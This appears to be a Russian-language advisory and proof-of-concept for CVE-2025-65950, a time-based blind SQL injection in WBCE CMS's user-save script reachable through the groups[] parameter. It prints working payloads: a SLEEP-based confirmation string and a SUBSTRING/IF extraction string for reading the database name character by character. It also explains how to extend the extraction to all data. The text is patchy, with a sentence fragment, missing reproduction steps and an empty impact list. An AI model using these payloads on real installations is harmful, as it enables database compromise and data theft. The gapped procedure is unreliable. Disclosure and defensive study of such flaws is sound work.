
Эксплойт proof-of-concept для критической уязвимости временной слепой SQL-инъекции в WBCE CMS, позволяющий пользователям с низкими привилегиями выполнять произвольные SQL-запросы и извлекать содержимое базы данных.
| Поле | Детали |
|---|
| CVE ID | CVE-2025-65950 |
| Критичность | КРИТИЧЕСКИЙ |
| Уведомление | Посмотреть уведомление |
| Обнаружено | Lukasz Rybak |
Критическая уязвимость SQL-инъекции в модуле управления пользователями позволяет аутентифицированному пользователю с низкими привилегиями, имеющему права на изменение пользователей, выполнять произвольные SQL-запросы. Это может быть использовано для полной компрометации базы данных, кражи данных и фактического обхода всех средств защиты.
Уязвимость существует в скрипте admin/users/save.php, который обрабатывает обновления профилей пользователей. Скрипт неправильно обрабатывает параметр groups[], переданный из формы редактирования пользователя.
Доказательство концепции включает использование временной слепой SQL-инъекции для подтверждения произвольного выполнения SQL.
users_modify). Этот пользователь не обязан быть полным администратором.
Шаги воспроизведения:
a. Войдите в систему как пользователь с низкими привилегиями. b. Перейдите в «Access» -> «Users» и выберите любого пользователя для изменения.



d. Измените параметр `groups[]`, используя следующую URL-кодированную нагрузку, которая попытается заставить базу данных ожидать 10 секунд: groups%5B%5D=2%27+%2C+%60active%60+%3D+SLEEP(10)+--+
*(Декодированная нагрузка: 2' , `active` = SLEEP(10) -- )*
f. Отправьте измененный запрос.
3. Проверка:

Пример кражи данных: получение имени базы данных
**Пример нагрузки для проверки символа:**
groups%5B%5D=2%27+%2C+%60active%60+%3D+IF(SUBSTRING(DATABASE()%2C+1%2C+1)+%3D+%27w%27%2C+SLEEP(5)%2C+0)+--+
Этот ручной процесс можно продолжить, чтобы выяснить полное имя базы данных, а затем и любые другие данные в базе.


Пользователь с низкими привилегиями, который должен иметь возможность только безобидно изменять профили пользователей, может получить полный контроль над базой данных.
Влияние включает, помимо прочего:
Этот CVE был ответственно раскрыт в соответствии с практикой координированного раскрытия уязвимостей. Предоставленная информация предназначена только для образовательных и защитных целей.